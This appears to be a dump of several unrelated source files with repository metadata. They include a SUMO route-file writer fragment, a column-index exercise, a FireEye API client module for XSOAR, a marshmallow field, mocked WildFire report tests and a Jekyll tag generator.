if cumulatedProbs >= randProb:
selected = i
break
# generate the *.rou.xml
foutrout.write(' <vehicle id="%s" depart="%.2f" departLane="%s" departPos="%s" departSpeed="%s">\n'
% (vehObj.label, vehObj.depart, vehObj.departlane, vehObj.departpos, vehObj.departspeed))
foutrout.write(
' <route edges="%s"/>\n' % vehObj.routesList[selected].edges)
foutrout.write(' </vehicle> \n')
# generate the *.rou.alt.xml
fout.write(' <vehicle id="%s" depart="%.2f" departLane="%s" departPos="%s" departSpeed="%s">\n'
% (vehObj.label, vehObj.depart, vehObj.departlane, vehObj.departpos, vehObj.departspeed))
fout.write(' <routeDistribution last="%s">\n' % selected)
for route in vehObj.routesList:
fout.write(' <route cost="%.4f" probability="%s" edges="%s"/>\n' %
(route.act_cost, route.ex_probability, route.edges))
fout.write(' </routeDistribution>\n')
fout.write(' </vehicle> \n')
fout.write('</route-alternatives>\n')
fout.close()
foutrout.write('</routes>\n')
foutrout.close()
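# Typical invocation from an iterative assignment loop (file names and
# parameter values below are assumptions for illustration):
#
#   edgesMap = {}
#   for step in range(1, nSteps):
#       roufile, edgesMap = getRouteChoices(
#           edgesMap, 'dump_%03i.xml' % step, 'trips_%03i.rou.alt.xml' % step,
#           'net.net.xml', 'addweights.xml', alpha=0.5, beta=0.9, step=step)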
| 39.842832 | 120 | 0.5637 |
ed71656700d1db7b25b8e9ec5248f1b9bc9d5715
| 358 |
py
|
Python
|
elements/python/5/9/soln.py
|
mmcloughlin/problems
|
6095842ffe007a12ec8c2093850515aa4e046616
|
[
"MIT"
] | 11 |
2019-02-08T06:54:34.000Z
|
2021-08-07T18:57:39.000Z
|
elements/python/5/9/soln.py
|
mmcloughlin/problems
|
6095842ffe007a12ec8c2093850515aa4e046616
|
[
"MIT"
] | 1 |
2019-05-21T08:14:10.000Z
|
2019-05-21T08:14:10.000Z
|
elements/python/5/9/soln.py
|
mmcloughlin/problems
|
6095842ffe007a12ec8c2093850515aa4e046616
|
[
"MIT"
] | null | null | null |
def column_index(ref):
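    # Interpret the reference as a bijective base-26 numeral:
    # 'A'..'Z' map to 1..26, so 'AA' = 26*1 + 1 = 27 and 'AZ' = 26*1 + 26 = 52.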
n = 0
for ch in ref:
x = ord(ch) - ord('A') + 1
n = 26*n + x
return n
def test():
assert column_index('A') == 1
assert column_index('Z') == 26
assert column_index('AA') == 27
assert column_index('AZ') == 52
def main():
test()
    print('pass')
if __name__ == '__main__':
main()
| 15.565217 | 35 | 0.522346 |
1314332eb6760e67b08fcc54cc48edf6495afbcd
| 15,488 |
py
|
Python
|
Packs/ApiModules/Scripts/FireEyeApiModule/FireEyeApiModule.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | null | null | null |
Packs/ApiModules/Scripts/FireEyeApiModule/FireEyeApiModule.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | 2 |
2021-12-26T07:34:37.000Z
|
2021-12-26T07:49:34.000Z
|
Packs/ApiModules/Scripts/FireEyeApiModule/FireEyeApiModule.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | null | null | null |
from CommonServerPython import *
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' CONSTANTS '''
FE_DATE_FORMAT = '%Y-%m-%dT%H:%M:%S'
OK_CODES = (200, 206)
class FireEyeClient(BaseClient):
def __init__(self, base_url: str,
username: str, password: str,
verify: bool, proxy: bool,
ok_codes: tuple = OK_CODES):
super().__init__(base_url=base_url, auth=(username, password), verify=verify, proxy=proxy, ok_codes=ok_codes)
self._headers = {
'X-FeApi-Token': self._get_token(),
'Accept': 'application/json',
}
@logger
def http_request(self, method: str, url_suffix: str = '', json_data: dict = None, params: dict = None,
timeout: int = 10, resp_type: str = 'json', retries: int = 1):
try:
address = urljoin(self._base_url, url_suffix)
res = self._session.request(
method,
address,
headers=self._headers,
verify=self._verify,
params=params,
json=json_data,
timeout=timeout
)
# Handle error responses gracefully
if not self._is_status_code_valid(res):
err_msg = f'Error in API call {res.status_code} - {res.reason}'
try:
# Try to parse json error response
error_entry = res.json()
err_msg += f'\n{json.dumps(error_entry)}'
if 'Server Error. code:AUTH004' in err_msg and retries:
                        # implement one retry with a freshly generated token and
                        # return the retried response instead of falling through
                        self._headers['X-FeApi-Token'] = self._generate_token()
                        return self.http_request(method, url_suffix, json_data, params, timeout, resp_type, retries - 1)
else:
raise DemistoException(err_msg, res=res)
except ValueError:
err_msg += f'\n{res.text}'
raise DemistoException(err_msg, res=res)
resp_type = resp_type.lower()
try:
if resp_type == 'json':
return res.json()
if resp_type == 'text':
return res.text
if resp_type == 'content':
return res.content
return res
except ValueError:
raise DemistoException('Failed to parse json object from response.')
except requests.exceptions.ConnectTimeout as exception:
err_msg = 'Connection Timeout Error - potential reasons might be that the Server URL parameter' \
' is incorrect or that the Server is not accessible from your host.'
raise DemistoException(err_msg, exception)
except requests.exceptions.SSLError as exception:
# in case the "Trust any certificate" is already checked
if not self._verify:
raise
err_msg = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' checkbox in' \
' the integration configuration.'
raise DemistoException(err_msg, exception)
except requests.exceptions.ProxyError as exception:
err_msg = 'Proxy Error - if the \'Use system proxy\' checkbox in the integration configuration is' \
' selected, try clearing the checkbox.'
raise DemistoException(err_msg, exception)
except requests.exceptions.ConnectionError as exception:
# Get originating Exception in Exception chain
error_class = str(exception.__class__)
err_type = '<' + error_class[error_class.find('\'') + 1: error_class.rfind('\'')] + '>'
err_msg = f'Verify that the server URL parameter' \
f' is correct and that you have access to the server from your host.' \
f'\nError Type: {err_type}\nError Number: [{exception.errno}]\nMessage: {exception.strerror}\n'
raise DemistoException(err_msg, exception)
@logger
def _get_token(self) -> str:
"""
        Obtains a token from the integration context if one is available and still
        valid (tokens live for 15 minutes according to the API; we cache them for 10).
After expiration, new token are generated and stored in the integration context.
Returns:
str: token that will be added to authorization header.
"""
integration_context = get_integration_context()
token = integration_context.get('token', '')
valid_until = integration_context.get('valid_until')
now = datetime.now()
now_timestamp = datetime.timestamp(now)
# if there is a key and valid_until, and the current time is smaller than the valid until
# return the current token
if token and valid_until:
if now_timestamp < valid_until:
return token
# else generate a token and update the integration context accordingly
token = self._generate_token()
return token
@logger
def _generate_token(self) -> str:
resp = self._http_request(method='POST', url_suffix='auth/login', resp_type='response')
if resp.status_code != 200:
raise DemistoException(
f'Token request failed with status code {resp.status_code}. message: {str(resp)}')
if 'X-FeApi-Token' not in resp.headers:
raise DemistoException(
f'Token request failed. API token is missing. message: {str(resp)}')
token = resp.headers['X-FeApi-Token']
integration_context = get_integration_context()
integration_context.update({'token': token})
        time_buffer = 600  # cache the token for 600 seconds (10 minutes), safely below the 15-minute API validity
integration_context.update({'valid_until': datetime.timestamp(datetime.now() + timedelta(seconds=time_buffer))})
set_integration_context(integration_context)
return token
@logger
def get_alerts_request(self, request_params: Dict[str, Any]) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix='alerts', params=request_params, resp_type='json')
@logger
def get_alert_details_request(self, alert_id: str, timeout: int) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix=f'alerts/alert/{alert_id}', resp_type='json',
timeout=timeout)
@logger
def alert_acknowledge_request(self, uuid: str) -> Dict[str, str]:
# json_data here is redundant as we are not sending any meaningful data,
# but without it the API call to FireEye fails and we are getting an error. hence sending it with a dummy value.
# the error we get when not sending json_data is: "Bad Request" with Invalid input. code:ALRTCONF001
return self.http_request(method='POST', url_suffix=f'alerts/alert/{uuid}',
params={'schema_compatibility': True}, json_data={"annotation": "<test>"},
resp_type='resp')
@logger
def get_artifacts_by_uuid_request(self, uuid: str, timeout: int) -> Dict[str, str]:
self._headers.pop('Accept') # returns a file, hence this header is disruptive
return self.http_request(method='GET', url_suffix=f'artifacts/{uuid}', resp_type='content',
timeout=timeout)
@logger
def get_artifacts_metadata_by_uuid_request(self, uuid: str) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix=f'artifacts/{uuid}/meta', resp_type='json')
@logger
def get_events_request(self, duration: str, end_time: str, mvx_correlated_only: bool) -> Dict[str, str]:
return self.http_request(method='GET',
url_suffix='events',
params={
'event_type': 'Ips Event',
'duration': duration,
'end_time': end_time,
'mvx_correlated_only': mvx_correlated_only
},
resp_type='json')
@logger
def get_quarantined_emails_request(self, start_time: str, end_time: str, from_: str, subject: str,
appliance_id: str, limit: int) -> Dict[str, str]:
params = {
'start_time': start_time,
'end_time': end_time,
'limit': limit
}
if from_:
params['from'] = from_
if subject:
params['subject'] = subject
if appliance_id:
params['appliance_id'] = appliance_id
return self.http_request(method='GET', url_suffix='emailmgmt/quarantine', params=params, resp_type='json')
@logger
def release_quarantined_emails_request(self, queue_ids: list, sensor_name: str):
return self.http_request(method='POST',
url_suffix='emailmgmt/quarantine/release',
params={'sensorName': sensor_name},
json_data={"queue_ids": queue_ids},
resp_type='resp')
@logger
def delete_quarantined_emails_request(self, queue_ids: list, sensor_name: str = ''):
return self.http_request(method='POST',
url_suffix='emailmgmt/quarantine/delete',
params={'sensorName': sensor_name},
json_data={"queue_ids": queue_ids},
resp_type='resp')
@logger
    def download_quarantined_emails_request(self, queue_id: str, timeout: int, sensor_name: str = ''):
self._headers.pop('Accept') # returns a file, hence this header is disruptive
return self.http_request(method='GET',
url_suffix=f'emailmgmt/quarantine/{queue_id}',
params={'sensorName': sensor_name},
resp_type='content',
timeout=timeout)
@logger
def get_reports_request(self, report_type: str, start_time: str, end_time: str, limit: str, interface: str,
alert_id: str, infection_type: str, infection_id: str, timeout: int):
params = {
'report_type': report_type,
'start_time': start_time,
'end_time': end_time
}
if limit:
params['limit'] = limit
if interface:
params['interface'] = interface
if alert_id:
params['id'] = alert_id
if infection_type:
params['infection_type'] = infection_type
if infection_id:
params['infection_id'] = infection_id
return self.http_request(method='GET',
url_suffix='reports/report',
params=params,
resp_type='content',
timeout=timeout)
@logger
def list_allowedlist_request(self, type_: str) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix=f'devicemgmt/emlconfig/policy/allowed_lists/{type_}',
resp_type='json')
@logger
def create_allowedlist_request(self, type_: str, entry_value: str, matches: int) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/allowed_lists/{type_}',
params={'operation': 'create'},
json_data={"name": entry_value, "matches": matches},
resp_type='resp')
@logger
def update_allowedlist_request(self, type_: str, entry_value: str, matches: int) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/allowed_lists/{type_}/{entry_value}',
json_data={"matches": matches},
resp_type='resp')
@logger
def delete_allowedlist_request(self, type_: str, entry_value: str) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/allowed_lists/{type_}/{entry_value}',
params={'operation': 'delete'},
resp_type='resp')
@logger
def list_blockedlist_request(self, type_: str) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix=f'devicemgmt/emlconfig/policy/blocked_lists/{type_}',
resp_type='json')
@logger
def create_blockedlist_request(self, type_: str, entry_value: str, matches: int) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/blocked_lists/{type_}',
params={'operation': 'create'},
json_data={'name': entry_value, 'matches': matches},
resp_type='resp')
@logger
def update_blockedlist_request(self, type_: str, entry_value: str, matches: int) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/blocked_lists/{type_}/{entry_value}',
json_data={"matches": matches},
resp_type='resp')
@logger
def delete_blockedlist_request(self, type_: str, entry_value: str) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/blocked_lists/{type_}/{entry_value}',
params={'operation': 'delete'},
resp_type='resp')
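# Minimal usage sketch (the base URL, credentials and request parameters
# below are placeholders, not values taken from this module):
#
#   client = FireEyeClient(base_url='https://fireeye.example.com/wsapis/v2.0.0/',
#                          username='api_user', password='secret',
#                          verify=True, proxy=False)
#   alerts = client.get_alerts_request({'duration': '48_hours'})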
def to_fe_datetime_converter(time_given: str = 'now') -> str:
"""Generates a string in the FireEye format, e.g: 2015-01-24T16:30:00.000-07:00
Examples:
>>> to_fe_datetime_converter('2021-05-14T01:08:04.000-02:00')
2021-05-14T01:08:04.000-02:00
>>> to_fe_datetime_converter('now')
2021-05-23T06:45:16.688+00:00
Args:
time_given: the time given, if none given, the default is now.
Returns:
The time given in FireEye format.
"""
date_obj = dateparser.parse(time_given)
fe_time = date_obj.strftime(FE_DATE_FORMAT)
fe_time += f'.{date_obj.strftime("%f")[:3]}'
if not date_obj.tzinfo:
given_timezone = '+00:00'
else:
given_timezone = f'{date_obj.strftime("%z")[:3]}:{date_obj.strftime("%z")[3:]}' # converting the timezone
fe_time += given_timezone
return fe_time
def alert_severity_to_dbot_score(severity_str: str):
severity = severity_str.lower()
if severity == 'minr':
return 1
if severity == 'majr':
return 2
if severity == 'crit':
return 3
demisto.info(f'FireEye Incident severity: {severity} is not known. Setting as unknown(DBotScore of 0).')
return 0
| 46.650602 | 120 | 0.570764 |
b95a46feb812629ea5b487e0c49294b20678f680
| 301 |
py
|
Python
|
project/api/fields.py
|
DanielGrams/cityservice
|
c487c34b5ba6541dcb441fe903ab2012c2256893
|
[
"MIT"
] | null | null | null |
project/api/fields.py
|
DanielGrams/cityservice
|
c487c34b5ba6541dcb441fe903ab2012c2256893
|
[
"MIT"
] | 35 |
2022-01-24T22:15:59.000Z
|
2022-03-31T15:01:35.000Z
|
project/api/fields.py
|
DanielGrams/cityservice
|
c487c34b5ba6541dcb441fe903ab2012c2256893
|
[
"MIT"
] | null | null | null |
from marshmallow import fields
from project.dateutils import berlin_tz
class CustomDateTimeField(fields.DateTime):
def _serialize(self, value, attr, obj, **kwargs):
if value:
value = value.astimezone(berlin_tz)
return super()._serialize(value, attr, obj, **kwargs)
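# Minimal usage sketch (hypothetical schema, not part of this module):
#
#   from marshmallow import Schema
#
#   class EventSchema(Schema):
#       start = CustomDateTimeField()
#
#   # dump() renders 'start' shifted into the Berlin timezone, e.g.
#   # EventSchema().dump({"start": some_aware_datetime})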
| 25.083333 | 61 | 0.697674 |
b9855a7b8af3720e6d1dbd812feacca892103be0
| 5,114 |
py
|
Python
|
Packs/Palo_Alto_Networks_WildFire/Integrations/WildFireReports/WildFireReports_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 2 |
2021-12-06T21:38:24.000Z
|
2022-01-13T08:23:36.000Z
|
Packs/Palo_Alto_Networks_WildFire/Integrations/WildFireReports/WildFireReports_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 87 |
2022-02-23T12:10:53.000Z
|
2022-03-31T11:29:05.000Z
|
Packs/Palo_Alto_Networks_WildFire/Integrations/WildFireReports/WildFireReports_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 2 |
2022-01-05T15:27:01.000Z
|
2022-02-01T19:27:43.000Z
|
import base64
import demistomock as demisto
from WildFireReports import main
import requests_mock
def test_wildfire_report(mocker):
"""
Given:
A sha256 represents a file uploaded to WildFire.
When:
internal-wildfire-get-report command is running.
Then:
Ensure that the command is running as expected.
"""
mock_sha256 = 'abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890'
mocker.patch.object(demisto, 'command', return_value='internal-wildfire-get-report')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': '123456'})
mocker.patch.object(demisto, 'args', return_value={'sha256': mock_sha256})
with open('test_data/response.pdf', 'rb') as file:
        file_content = file.read()
mocker.patch('WildFireReports.fileResult', return_value=file_content) # prevent file creation
demisto_mock = mocker.patch.object(demisto, 'results')
with requests_mock.Mocker() as m:
m.post(f'https://test.com/publicapi/get/report?format=pdf&hash={mock_sha256}', content=file_content)
main()
assert demisto_mock.call_args_list[0][0][0]['data'] == base64.b64encode(file_content).decode()
def test_report_not_found(mocker):
"""
Given:
A sha256 represents a file not uploaded to WildFire.
When:
internal-wildfire-get-report command is running.
Then:
Ensure that the command is running as expected.
"""
mock_sha256 = 'abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567891'
mocker.patch.object(demisto, 'command', return_value='internal-wildfire-get-report')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': '123456'})
mocker.patch.object(demisto, 'args', return_value={'sha256': mock_sha256})
demisto_mock = mocker.patch.object(demisto, 'results')
with requests_mock.Mocker() as m:
m.post(f'https://test.com/publicapi/get/report?format=pdf&hash={mock_sha256}', status_code=404)
main()
assert demisto_mock.call_args[0][0] == {'status': 'not found'}
def test_incorrect_sha256(mocker):
"""
Given:
An incorrect sha256.
When:
internal-wildfire-get-report command is running.
Then:
Ensure that the command is running as expected.
"""
mock_sha256 = 'abcdef1234567890abcdef1234567890abcdef1234567890abcdef123456789' # The length is 63 insteadof 64
mocker.patch.object(demisto, 'command', return_value='internal-wildfire-get-report')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': '123456'})
mocker.patch.object(demisto, 'args', return_value={'sha256': mock_sha256})
demisto_mock = mocker.patch.object(demisto, 'results')
expected_description_error = 'Failed to download report.\nError:\nInvalid hash. Only SHA256 are supported.'
main()
assert demisto_mock.call_args_list[0].args[0].get('error', {}).get('description') == expected_description_error
def test_incorrect_authorization(mocker):
"""
Given:
An incorrect API token.
When:
test-module command is running.
Then:
Ensure that the command is running as expected.
"""
mocker.patch.object(demisto, 'command', return_value='test-module')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': 'incorrect api token'})
demisto_mock = mocker.patch.object(demisto, 'results')
expected_description_error = 'Authorization Error: make sure API Key is correctly set'
url = 'https://test.com/publicapi/get/report'
params = '?apikey=incorrect+api+token&format=pdf&hash=dca86121cc7427e375fd24fe5871d727'
with requests_mock.Mocker() as m:
m.post(url + params, status_code=401)
main()
assert demisto_mock.call_args_list[0].args[0] == expected_description_error
def test_empty_api_token(mocker):
"""
Given:
An empty API token.
When:
test-module command is running.
Then:
Ensure that the command is running as expected.
"""
mocker.patch.object(demisto, 'command', return_value='test-module')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': ''})
mocker.patch.object(demisto, 'getLicenseCustomField', return_value=None)
demisto_mock = mocker.patch('WildFireReports.return_error')
expected_description_error = 'Authorization Error: It\'s seems that the token is empty and you have not a ' \
'TIM license that is up-to-date, Please fill the token or update your TIM license ' \
'and try again.'
main()
assert demisto_mock.call_args_list[0].args[0] == expected_description_error
def test_user_secrets():
from WildFireReports import LOG, Client
client = Client(token='%%This_is_API_key%%', base_url='url')
res = LOG(client.token)
assert "%%This_is_API_key%%" not in res
| 37.881481 | 120 | 0.688698 |
b9e603dad544416c8aafede286add848d2811213
| 2,569 |
py
|
Python
|
tag_generator.py
|
e5k/e5k.github.io
|
9f2e2097a87e38501a12760024e655b9cb8e9226
|
[
"MIT"
] | null | null | null |
tag_generator.py
|
e5k/e5k.github.io
|
9f2e2097a87e38501a12760024e655b9cb8e9226
|
[
"MIT"
] | null | null | null |
tag_generator.py
|
e5k/e5k.github.io
|
9f2e2097a87e38501a12760024e655b9cb8e9226
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
'''
tag_generator.py
Copyright 2017 Long Qian
Contact: [email protected]
This script creates tags for your Jekyll blog hosted by Github page.
No plugins required.
'''
import glob
import os
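# The script expects each post's YAML front matter to carry the tag and
# category lists on single, space-separated lines, e.g. (illustrative):
#
#   ---
#   layout: post
#   tags: python jekyll
#   categories: blog
#   ---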
tag_dir = 'tag/'
post_dir = '_posts/'
filenames = glob.glob(post_dir + '*md')
page_dir = 'pages/'
filenames = filenames + glob.glob(page_dir + '*md')
#post_dir = 'pages/'
#filenames = filenames + [os.path.join(root, name)
# for root, dirs, files in os.walk(post_dir)
# for name in files
# if name.endswith(('md'))]
print(filenames)
total_tags = []
for filename in filenames:
f = open(filename, 'r')
crawl = False
for line in f:
if crawl:
current_tags = line.strip().split()
            if current_tags and current_tags[0] == 'tags:':
total_tags.extend(current_tags[1:])
crawl = False
break
if line.strip() == '---':
if not crawl:
crawl = True
else:
crawl = False
break
f.close()
total_tags = set(total_tags)
old_tags = glob.glob(tag_dir + '*.md')
for tag in old_tags:
os.remove(tag)
for tag in total_tags:
tag_filename = tag_dir + tag + '.md'
f = open(tag_filename, 'a')
write_str = '---\nlayout: tagpage\ntitle: \"Tag: ' + tag + '\"\ntag: ' + tag + '\nrobots: noindex\n---\n'
f.write(write_str)
f.close()
print("Tags generated, count", total_tags.__len__())
category_dir = 'category/'
total_categories = []
for filename in filenames:
f = open(filename, 'r')
crawl = False
for line in f:
if crawl:
current_categories = line.strip().split()
            if current_categories and current_categories[0] == 'categories:':
total_categories.extend(current_categories[1:])
crawl = False
break
if line.strip() == '---':
if not crawl:
crawl = True
else:
crawl = False
break
f.close()
total_categories = set(total_categories)
old_categories = glob.glob(category_dir + '*.md')
for category in old_categories:
os.remove(category)
for category in total_categories:
category_filename = category_dir + category + '.md'
f = open(category_filename, 'a')
write_str = '---\nlayout: categorypage\ntitle: \"Category: ' + category + '\"\ncategories: ' + category + '\nrobots: noindex\n---\n'
f.write(write_str)
f.close()
print("Categories generated, count", total_categories.__len__())
| 25.949495 | 136 | 0.58116 |